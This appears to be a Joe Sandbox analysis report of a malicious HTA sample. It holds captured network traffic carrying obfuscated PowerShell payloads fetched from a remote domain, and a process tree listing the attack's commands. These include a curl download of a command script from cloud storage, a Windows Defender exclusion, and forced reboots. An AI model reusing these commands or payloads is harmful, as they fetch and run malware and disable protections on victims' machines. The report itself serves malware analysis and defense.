2024-12-12 11:56:03 UTC	8000	IN	Data Raw: 20 3d 20 22 24 7b 2f 3d 5c 5f 2f 5c 5f 2f 3d 3d 3d 5c 2f 5c 2f 5c 2f 7d 5c 24 7b 5f 5c 5c 5c 5c 5c 5c 2f 7c 5c 5f 2f 7c 2f 5c 5c 5c 5f 5f 5f 5c 5c 5c 5c 2f 7c 5f 7d 62 74 2e 6c 6e 6b 22 20 0d 0a 23 5f 5f 5f 5f 5f 2f 5c 5f 2f 5c 2f 5c 5f 2f 5c 2f 3d 5c 5c 5c 5c 5c 5c 5c 5c 5c 5c 2f 2f 2f 2f 2f 5c 5c 5c 5c 5c 5c 5c 5c 5c 5c 5c 5c 5c 5c 5c 5c 5c 5c 5c 5c 5c 5c 5c 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 20 24 7b 5f 5f 5f 2f 5c 5f 2f 5c 2f 3d 3d 3d 5c 2f 5c 5f 5f 7d 20 20 24 7b 5f 2f 3d 5c 2f 3d 5c 2f 5c 5f 2f 5c 2f 3d 5c 5f 5f 7d 20 0d 0a 0d 0a 24 7b 5f 5f 5f 2f 5c 5f 2f 5c 2f 3d 3d 3d 5c 2f 5c 5f 5f 7d 20 3d 20 22 24 7b 2f 3d 5c 5f 2f 5c 5f 2f 3d 3d 3d 5c 2f 5c 2f 5c 2f 7d 5c 24 7b 5f 5c 5c 5c 5c 5c 5c 2f 7c 5c 5f 2f 7c 2f 5c 5c Data Ascii: = "${/=\_/\_/===\/\/\/}\${_\\\\\\/\|\_/\|/\\\___\\\\/\|_}bt.lnk" #_____/\_/\/\_/\/=\\\\\\\\\\/////\\\\\\\\\\\\\\\\\\\\\\\/////////////////////// ${___/\_/\/===\/\__} ${_/=\/=\/\_/\/=\__} ${___/\_/\/===\/\__} = "${/=\_/\_/===\/\/\/}\${_\\\\\\/\|\_/\|/\\
2024-12-12 11:56:03 UTC	715	IN	Data Raw: 5c 5c 5f 5f 5f 5c 5c 5c 5c 2f 7c 5f 7d 5c 24 7b 5f 6a 6c 5f 7d 24 7b 5f 64 78 5f 7d 22 0d 0a 24 62 79 74 65 73 20 3d 20 5b 53 79 73 74 65 6d 2e 49 4f 2e 46 69 6c 65 5d 3a 3a 52 65 61 64 41 6c 6c 42 79 74 65 73 28 24 70 61 74 68 29 0d 0a 69 66 20 28 24 62 79 74 65 73 5b 30 5d 20 2d 65 71 20 30 78 37 42 20 2d 61 6e 64 20 24 62 79 74 65 73 5b 31 5d 20 2d 65 71 20 30 78 37 44 20 2d 61 6e 64 20 24 62 79 74 65 73 5b 32 5d 20 2d 65 71 20 30 78 32 43 29 20 7b 0d 0a 20 20 20 20 24 6e 65 77 42 79 74 65 73 20 3d 20 24 62 79 74 65 73 5b 33 2e 2e 28 24 62 79 74 65 73 2e 4c 65 6e 67 74 68 20 2d 20 31 29 5d 0d 0a 20 20 20 20 5b 53 79 73 74 65 6d 2e 49 4f 2e 46 69 6c 65 5d 3a 3a 57 72 69 74 65 41 6c 6c 42 79 74 65 73 28 24 70 61 74 68 2c 20 24 6e 65 77 42 79 74 65 73 29 Data Ascii: \\___\\\\/\|_}\${_jl_}${_dx_}"$bytes = [System.IO.File]::ReadAllBytes($path)if ($bytes[0] -eq 0x7B -and $bytes[1] -eq 0x7D -and $bytes[2] -eq 0x2C) { $newBytes = $bytes[3..($bytes.Length - 1)] [System.IO.File]::WriteAllBytes($path, $newBytes)

Timestamp	Bytes transferred	Direction	Data
2024-12-12 11:56:16 UTC	83	OUT	GET /a/08/150822/up/up HTTP/1.1 Host: contablefea.shop Connection: Keep-Alive
2024-12-12 11:56:16 UTC	323	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 11:56:16 GMT Server: Apache/2.4.58 (Ubuntu) Strict-Transport-Security: max-age=31536000 Content-Security-Policy: upgrade-insecure-requests Last-Modified: Wed, 04 Dec 2024 17:35:21 GMT ETag: "6793-6287534b7a840" Accept-Ranges: bytes Content-Length: 26515 Connection: close
2024-12-12 11:56:16 UTC	7869	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 20 5f 5f 5f 5f 2f 2f 2f 2f 2f 2f 2f 2f 2f 20 7b 20 0d 0a 5b 63 6d 64 6c 65 74 42 69 6e 64 69 6e 67 28 29 5d 20 20 20 20 20 0d 0a 70 61 72 61 6d 20 28 20 0d 0a 5b 73 74 72 69 6e 67 5d 24 43 6f 6d 70 75 74 65 72 4e 61 6d 65 20 3d 20 22 24 65 6e 76 3a 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 20 2c 20 0d 0a 24 43 72 65 64 65 6e 74 69 61 6c 20 0d 0a 29 20 0d 0a 20 20 20 20 42 45 47 49 4e 20 20 0d 0a 20 20 20 20 20 20 20 20 7b 20 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 77 6d 69 51 75 65 72 79 20 3d 20 22 53 45 4c 45 43 54 20 2a 20 46 52 4f 4d 20 41 6e 74 69 56 69 72 75 73 50 72 6f 64 75 63 74 22 20 0d 0a 20 20 20 20 20 20 20 20 7d 20 0d 0a 20 20 20 20 50 52 4f 43 45 53 53 20 20 0d 0a 20 20 20 20 20 20 20 20 7b 20 20 20 24 41 6e 74 69 Data Ascii: function ____///////// { [cmdletBinding()] param ( [string]$ComputerName = "$env:computername" , $Credential ) BEGIN { $wmiQuery = "SELECT * FROM AntiVirusProduct" } PROCESS { $Anti
2024-12-12 11:56:16 UTC	8000	IN	Data Raw: 5f 5f 5f 5f 5f 5f 7d 20 2d 43 6f 75 6e 74 20 31 0d 0a 24 7b 5f 5f 7c 7c 7c 7c 7c 7c 5f 7c 7c 7c 7c 7c 7c 5f 7c 2f 2f 2f 2f 2f 2f 5c 5c 5c 5c 5c 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 7d 20 3d 20 47 65 74 2d 52 61 6e 64 6f 6d 20 2d 49 6e 70 75 74 4f 62 6a 65 63 74 20 24 7b 5f 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 7d 2e 54 6f 55 70 70 65 72 28 29 20 2d 43 6f 75 6e 74 20 31 0d 0a 66 6f 72 65 61 63 68 28 24 6e 20 69 6e 20 24 7b 5f 5f 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 2f 2f 2f 2f 2f 2f 5c 5c 5c 5c 5c 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 7d 29 20 7b 0d 0a 24 7b 5f 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 2f 2f 2f 2f 2f 2f 5c 5c 5c 5c 5c 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 7d 20 Data Ascii: ______} -Count 1${__\|\|\|\|\|\|_\|\|\|\|\|\|_\|//////\\\\\________________} = Get-Random -InputObject ${_\|\|\|\|\|\|\|\|\|\|\|\|\|________________}.ToUpper() -Count 1foreach($n in ${__\|\|\|\|\|\|\|\|\|\|\|\|\|//////\\\\\________________}) {${_\|\|\|\|\|\|\|\|\|\|\|\|\|//////\\\\\________________}
2024-12-12 11:56:16 UTC	8000	IN	Data Raw: 73 74 72 69 6e 67 5d 24 7b 5f 5f 2f 3d 3d 5c 2f 5c 5f 2f 5c 2f 3d 5c 2f 5c 5f 2f 7d 29 3b 0d 0a 20 20 74 72 79 7b 20 20 0d 0a 20 20 20 20 24 7b 5f 5f 2f 5c 5f 2f 3d 5c 2f 3d 5c 2f 3d 3d 3d 3d 3d 7d 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 2d 43 6f 6d 4f 62 6a 65 63 74 20 57 53 63 72 69 70 74 2e 53 68 65 6c 6c 20 0d 0a 20 20 20 20 24 7b 2f 3d 5c 2f 5c 5f 5f 2f 3d 5c 2f 3d 5c 2f 3d 5c 5f 7d 20 3d 20 24 7b 5f 5f 2f 5c 5f 2f 3d 5c 2f 3d 5c 2f 3d 3d 3d 3d 3d 7d 2e 43 72 65 61 74 65 53 68 6f 72 74 63 75 74 28 24 7b 5f 5f 5f 2f 5c 5f 2f 3d 5c 5f 5f 5f 2f 5c 5f 2f 3d 3d 7d 29 20 0d 0a 20 20 20 20 24 7b 2f 3d 5c 2f 5c 5f 5f 2f 3d 5c 2f 3d 5c 2f 3d 5c 5f 7d 2e 54 61 72 67 65 74 50 61 74 68 20 3d 20 22 24 7b 2f 5f 2f 2f 5f 2f 2f 5f 2f 7d 22 20 20 20 20 20 20 20 0d Data Ascii: string]${__/==\/\_/\/=\/\_/}); try{ ${__/\_/=\/=\/=====} = New-Object -ComObject WScript.Shell ${/=\/\__/=\/=\/=\_} = ${__/\_/=\/=\/=====}.CreateShortcut(${___/\_/=\___/\_/==}) ${/=\/\__/=\/=\/=\_}.TargetPath = "${/_//_//_/}"
2024-12-12 11:56:16 UTC	2646	IN	Data Raw: 2f 2f 2f 2f 2f 2f 5f 7d 24 7b 5f 5c 5c 5c 5c 5c 5c 2f 7c 5c 5f 2f 7c 2f 5c 5c 5c 5f 5f 5f 5c 5c 5c 5c 2f 7c 5f 7d 5c 24 7b 5f 5c 5c 5c 5c 5c 5c 2f 7c 5c 5f 2f 7c 2f 5c 5c 5c 5f 5f 5f 5c 5c 5c 5c 2f 7c 5f 7d 2e 61 74 22 29 20 2d 50 61 74 68 20 28 22 24 7b 5f 5c 5c 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 5f 7d 24 7b 5f 5c 5c 5c 5c 5c 5c 2f 7c 5c 5f 2f 7c 2f 5c 5c 5c 5f 5f 5f 5c 5c 5c 5c 2f 7c 5f 7d 5c 63 24 7b 5f 74 78 5f 7d 22 29 0d 0a 52 65 6e 61 6d 65 2d 49 74 65 6d 20 2d 4e 65 77 4e 61 6d 65 20 28 22 24 7b 5f 5c 5c 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 5f 7d 24 7b 5f 5c 5c 5c 5c 5c 5c 2f 7c 5c 5f 2f 7c 2f 5c 5c 5c 5f 5f 5f 5c 5c 5c 5c 2f 7c 5f 7d 5c 24 7b 5f 5c 5c 5c 5c 5c 5c 2f 7c 5c 5f 2f 7c Data Ascii: //////_}${_\\\\\\/\|\_/\|/\\\___\\\\/\|_}\${_\\\\\\/\|\_/\|/\\\___\\\\/\|_}.at") -Path ("${_\\///////////////////////_}${_\\\\\\/\|\_/\|/\\\___\\\\/\|_}\c${_tx_}")Rename-Item -NewName ("${_\\///////////////////////_}${_\\\\\\/\|\_/\|/\\\___\\\\/\|_}\${_\\\\\\/\|\_/\|

Timestamp	Bytes transferred	Direction	Data
2024-12-12 11:57:01 UTC	83	OUT	GET /a/08/150822/up/up HTTP/1.1 Host: contablefea.shop Connection: Keep-Alive
2024-12-12 11:57:01 UTC	323	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 11:57:01 GMT Server: Apache/2.4.58 (Ubuntu) Strict-Transport-Security: max-age=31536000 Content-Security-Policy: upgrade-insecure-requests Last-Modified: Wed, 04 Dec 2024 17:35:21 GMT ETag: "6793-6287534b7a840" Accept-Ranges: bytes Content-Length: 26515 Connection: close
2024-12-12 11:57:01 UTC	7869	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 20 5f 5f 5f 5f 2f 2f 2f 2f 2f 2f 2f 2f 2f 20 7b 20 0d 0a 5b 63 6d 64 6c 65 74 42 69 6e 64 69 6e 67 28 29 5d 20 20 20 20 20 0d 0a 70 61 72 61 6d 20 28 20 0d 0a 5b 73 74 72 69 6e 67 5d 24 43 6f 6d 70 75 74 65 72 4e 61 6d 65 20 3d 20 22 24 65 6e 76 3a 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 20 2c 20 0d 0a 24 43 72 65 64 65 6e 74 69 61 6c 20 0d 0a 29 20 0d 0a 20 20 20 20 42 45 47 49 4e 20 20 0d 0a 20 20 20 20 20 20 20 20 7b 20 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 77 6d 69 51 75 65 72 79 20 3d 20 22 53 45 4c 45 43 54 20 2a 20 46 52 4f 4d 20 41 6e 74 69 56 69 72 75 73 50 72 6f 64 75 63 74 22 20 0d 0a 20 20 20 20 20 20 20 20 7d 20 0d 0a 20 20 20 20 50 52 4f 43 45 53 53 20 20 0d 0a 20 20 20 20 20 20 20 20 7b 20 20 20 24 41 6e 74 69 Data Ascii: function ____///////// { [cmdletBinding()] param ( [string]$ComputerName = "$env:computername" , $Credential ) BEGIN { $wmiQuery = "SELECT * FROM AntiVirusProduct" } PROCESS { $Anti
2024-12-12 11:57:01 UTC	8000	IN	Data Raw: 5f 5f 5f 5f 5f 5f 7d 20 2d 43 6f 75 6e 74 20 31 0d 0a 24 7b 5f 5f 7c 7c 7c 7c 7c 7c 5f 7c 7c 7c 7c 7c 7c 5f 7c 2f 2f 2f 2f 2f 2f 5c 5c 5c 5c 5c 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 7d 20 3d 20 47 65 74 2d 52 61 6e 64 6f 6d 20 2d 49 6e 70 75 74 4f 62 6a 65 63 74 20 24 7b 5f 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 7d 2e 54 6f 55 70 70 65 72 28 29 20 2d 43 6f 75 6e 74 20 31 0d 0a 66 6f 72 65 61 63 68 28 24 6e 20 69 6e 20 24 7b 5f 5f 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 2f 2f 2f 2f 2f 2f 5c 5c 5c 5c 5c 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 7d 29 20 7b 0d 0a 24 7b 5f 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 2f 2f 2f 2f 2f 2f 5c 5c 5c 5c 5c 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 7d 20 Data Ascii: ______} -Count 1${__\|\|\|\|\|\|_\|\|\|\|\|\|_\|//////\\\\\________________} = Get-Random -InputObject ${_\|\|\|\|\|\|\|\|\|\|\|\|\|________________}.ToUpper() -Count 1foreach($n in ${__\|\|\|\|\|\|\|\|\|\|\|\|\|//////\\\\\________________}) {${_\|\|\|\|\|\|\|\|\|\|\|\|\|//////\\\\\________________}
2024-12-12 11:57:01 UTC	8000	IN	Data Raw: 73 74 72 69 6e 67 5d 24 7b 5f 5f 2f 3d 3d 5c 2f 5c 5f 2f 5c 2f 3d 5c 2f 5c 5f 2f 7d 29 3b 0d 0a 20 20 74 72 79 7b 20 20 0d 0a 20 20 20 20 24 7b 5f 5f 2f 5c 5f 2f 3d 5c 2f 3d 5c 2f 3d 3d 3d 3d 3d 7d 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 2d 43 6f 6d 4f 62 6a 65 63 74 20 57 53 63 72 69 70 74 2e 53 68 65 6c 6c 20 0d 0a 20 20 20 20 24 7b 2f 3d 5c 2f 5c 5f 5f 2f 3d 5c 2f 3d 5c 2f 3d 5c 5f 7d 20 3d 20 24 7b 5f 5f 2f 5c 5f 2f 3d 5c 2f 3d 5c 2f 3d 3d 3d 3d 3d 7d 2e 43 72 65 61 74 65 53 68 6f 72 74 63 75 74 28 24 7b 5f 5f 5f 2f 5c 5f 2f 3d 5c 5f 5f 5f 2f 5c 5f 2f 3d 3d 7d 29 20 0d 0a 20 20 20 20 24 7b 2f 3d 5c 2f 5c 5f 5f 2f 3d 5c 2f 3d 5c 2f 3d 5c 5f 7d 2e 54 61 72 67 65 74 50 61 74 68 20 3d 20 22 24 7b 2f 5f 2f 2f 5f 2f 2f 5f 2f 7d 22 20 20 20 20 20 20 20 0d Data Ascii: string]${__/==\/\_/\/=\/\_/}); try{ ${__/\_/=\/=\/=====} = New-Object -ComObject WScript.Shell ${/=\/\__/=\/=\/=\_} = ${__/\_/=\/=\/=====}.CreateShortcut(${___/\_/=\___/\_/==}) ${/=\/\__/=\/=\/=\_}.TargetPath = "${/_//_//_/}"
2024-12-12 11:57:01 UTC	2646	IN	Data Raw: 2f 2f 2f 2f 2f 2f 5f 7d 24 7b 5f 5c 5c 5c 5c 5c 5c 2f 7c 5c 5f 2f 7c 2f 5c 5c 5c 5f 5f 5f 5c 5c 5c 5c 2f 7c 5f 7d 5c 24 7b 5f 5c 5c 5c 5c 5c 5c 2f 7c 5c 5f 2f 7c 2f 5c 5c 5c 5f 5f 5f 5c 5c 5c 5c 2f 7c 5f 7d 2e 61 74 22 29 20 2d 50 61 74 68 20 28 22 24 7b 5f 5c 5c 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 5f 7d 24 7b 5f 5c 5c 5c 5c 5c 5c 2f 7c 5c 5f 2f 7c 2f 5c 5c 5c 5f 5f 5f 5c 5c 5c 5c 2f 7c 5f 7d 5c 63 24 7b 5f 74 78 5f 7d 22 29 0d 0a 52 65 6e 61 6d 65 2d 49 74 65 6d 20 2d 4e 65 77 4e 61 6d 65 20 28 22 24 7b 5f 5c 5c 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 5f 7d 24 7b 5f 5c 5c 5c 5c 5c 5c 2f 7c 5c 5f 2f 7c 2f 5c 5c 5c 5f 5f 5f 5c 5c 5c 5c 2f 7c 5f 7d 5c 24 7b 5f 5c 5c 5c 5c 5c 5c 2f 7c 5c 5f 2f 7c Data Ascii: //////_}${_\\\\\\/\|\_/\|/\\\___\\\\/\|_}\${_\\\\\\/\|\_/\|/\\\___\\\\/\|_}.at") -Path ("${_\\///////////////////////_}${_\\\\\\/\|\_/\|/\\\___\\\\/\|_}\c${_tx_}")Rename-Item -NewName ("${_\\///////////////////////_}${_\\\\\\/\|\_/\|/\\\___\\\\/\|_}\${_\\\\\\/\|\_/\|

Timestamp	Bytes transferred	Direction	Data
2024-12-12 11:57:33 UTC	83	OUT	GET /a/08/150822/au/au HTTP/1.1 Host: contablefea.shop Connection: Keep-Alive
2024-12-12 11:57:33 UTC	321	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 11:57:33 GMT Server: Apache/2.4.58 (Ubuntu) Strict-Transport-Security: max-age=31536000 Content-Security-Policy: upgrade-insecure-requests Last-Modified: Tue, 19 Nov 2024 13:09:39 GMT ETag: "d96-62743bee16ac0" Accept-Ranges: bytes Content-Length: 3478 Connection: close
2024-12-12 11:57:33 UTC	3478	IN	Data Raw: 23 20 56 65 72 69 66 69 63 61 72 20 73 65 20 6f 20 4f 75 74 6c 6f 6f 6b 20 65 73 74 c3 a1 20 69 6e 73 74 61 6c 61 64 6f 20 61 6e 74 65 73 20 64 65 20 65 78 65 63 75 74 61 72 20 6f 20 72 65 73 74 61 6e 74 65 20 64 6f 20 73 63 72 69 70 74 0d 0a 74 72 79 20 7b 0d 0a 20 20 20 20 24 6f 75 74 6c 6f 6f 6b 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 2d 43 6f 6d 4f 62 6a 65 63 74 20 4f 75 74 6c 6f 6f 6b 2e 41 70 70 6c 69 63 61 74 69 6f 6e 0d 0a 7d 20 63 61 74 63 68 20 7b 0d 0a 20 20 20 20 57 72 69 74 65 2d 45 72 72 6f 72 20 22 4f 75 74 6c 6f 6f 6b 20 6e c3 a3 6f 20 65 73 74 c3 a1 20 69 6e 73 74 61 6c 61 64 6f 20 6f 75 20 6e c3 a3 6f 20 66 6f 69 20 65 6e 63 6f 6e 74 72 61 64 6f 20 6e 6f 20 73 69 73 74 65 6d 61 2e 22 0d 0a 20 20 20 20 65 78 69 74 20 31 20 20 23 20 49 Data Ascii: # Verificar se o Outlook est instalado antes de executar o restante do scripttry { $outlook = New-Object -ComObject Outlook.Application} catch { Write-Error "Outlook no est instalado ou no foi encontrado no sistema." exit 1 # I

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report copia111224mp.hta

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Other

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Privilege Escalation

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash__nczuwk7_Hi7.exe_ccc345aab11f53b802a47afde85de017385d7c_0829a100_de7c1d83-c4b4-4895-bde0-d778262481e7\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash__nczuwk7_Hi7.exe_ccc345aab11f53b802a47afde85de017385d7c_0829a100_ed7bb5d9-c13c-4142-9416-f2193754a4e9\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3C73.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3D2F.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3D4F.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3D6D.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3DDB.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3DFB.tmp.xml

C:\Users\user\AppData\Local\Microsoft\FORMS\FRMDATA64.DAT

C:\Users\user\AppData\Local\Microsoft\Office\16.0\outlook.exe_Rules.xml

C:\Users\user\AppData\Local\Microsoft\Office\OTele\outlook.exe.db

C:\Users\user\AppData\Local\Microsoft\Office\OTele\outlook.exe.db-journal

C:\Users\user\AppData\Local\Microsoft\Office\OTele\outlook.exe.db-shm

C:\Users\user\AppData\Local\Microsoft\Office\OTele\outlook.exe.db-wal

Windows Analysis Report
copia111224mp.hta

Target ID:	0
Start time:	06:55:56
Start date:	12/12/2024
Path:	C:\Windows\SysWOW64\mshta.exe
Wow64 process (32bit):	true
Commandline:	mshta.exe "C:\Users\user\Desktop\copia111224mp.hta"
Imagebase:	0x30000
File size:	13'312 bytes
MD5 hash:	06B02D5C097C7DB1F109749C45F3F505
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Target ID:	1
Start time:	06:55:59
Start date:	12/12/2024
Path:	C:\Windows\SysWOW64\curl.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\curl.exe" -o "C:\Wins32Update_\up.cmd" "https://firebasestorage.googleapis.com/v0/b/ola445.appspot.com/o/bt?alt=media&token=a5082314-a2a5-435c-8ef5-198776034a00"
Imagebase:	0xae0000
File size:	386'560 bytes
MD5 hash:	4329254E74AD91D047E3CEDCC7C138C3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	8
Start time:	06:56:14
Start date:	12/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\Public\computer_zayqgx5_K.cmd" "
Imagebase:	0x7ff7ff780000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	12
Start time:	06:56:34
Start date:	12/12/2024
Path:	C:\Windows\SysWOW64\shutdown.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\shutdown.exe" /r /t 10
Imagebase:	0xb30000
File size:	23'552 bytes
MD5 hash:	FCDE5AF99B82AE6137FB90C7571D40C3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	13
Start time:	06:56:37
Start date:	12/12/2024
Path:	C:\_nczuwk7_H\_nczuwk7_Hi7.exe
Wow64 process (32bit):	true
Commandline:	"C:\_nczuwk7_H\_nczuwk7_Hi7.exe"
Imagebase:	0x1a0000
File size:	15'936 bytes
MD5 hash:	4AFCAB972E98ECBF855F915B2739F508
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Has exited:	true

Target ID:	23
Start time:	06:56:38
Start date:	12/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\_nczuwk7_H"
Imagebase:	0xa80000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	29
Start time:	06:56:59
Start date:	12/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\Public\computer_nczuwk7_H.cmd" "
Imagebase:	0x7ff7ff780000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	33
Start time:	06:57:07
Start date:	12/12/2024
Path:	C:\Windows\System32\shutdown.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\shutdown.exe" /r /t 10
Imagebase:	0x7ff6a1250000
File size:	28'160 bytes
MD5 hash:	F2A4E18DA72BB2C5B21076A5DE382A20
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	34
Start time:	06:57:15
Start date:	12/12/2024
Path:	C:\_nczuwk7_H\_nczuwk7_H.exe
Wow64 process (32bit):	true
Commandline:	"C:\_nczuwk7_H\_nczuwk7_H.exe" C:\_nczuwk7_H\_nczuwk7_H.at
Imagebase:	0xbd0000
File size:	947'288 bytes
MD5 hash:	0ADB9B817F1DF7807576C2D7068DD931
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000022.00000003.153580650154.000000000407D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000022.00000003.153581335000.0000000004076000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000022.00000003.153580423847.0000000003F6E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000022.00000003.153580893069.0000000004077000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000022.00000003.153583371908.0000000003B25000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000022.00000003.153582564298.000000000418B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000022.00000003.153582817502.0000000003C37000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000022.00000003.153581113721.0000000004181000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000022.00000003.153581536572.0000000003E5B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000022.00000003.153581918930.0000000003F68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Target ID:	36
Start time:	06:57:31
Start date:	12/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\Public\computer_nczuwk7_Hy.cmd" "
Imagebase:	0x7ff7ff780000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false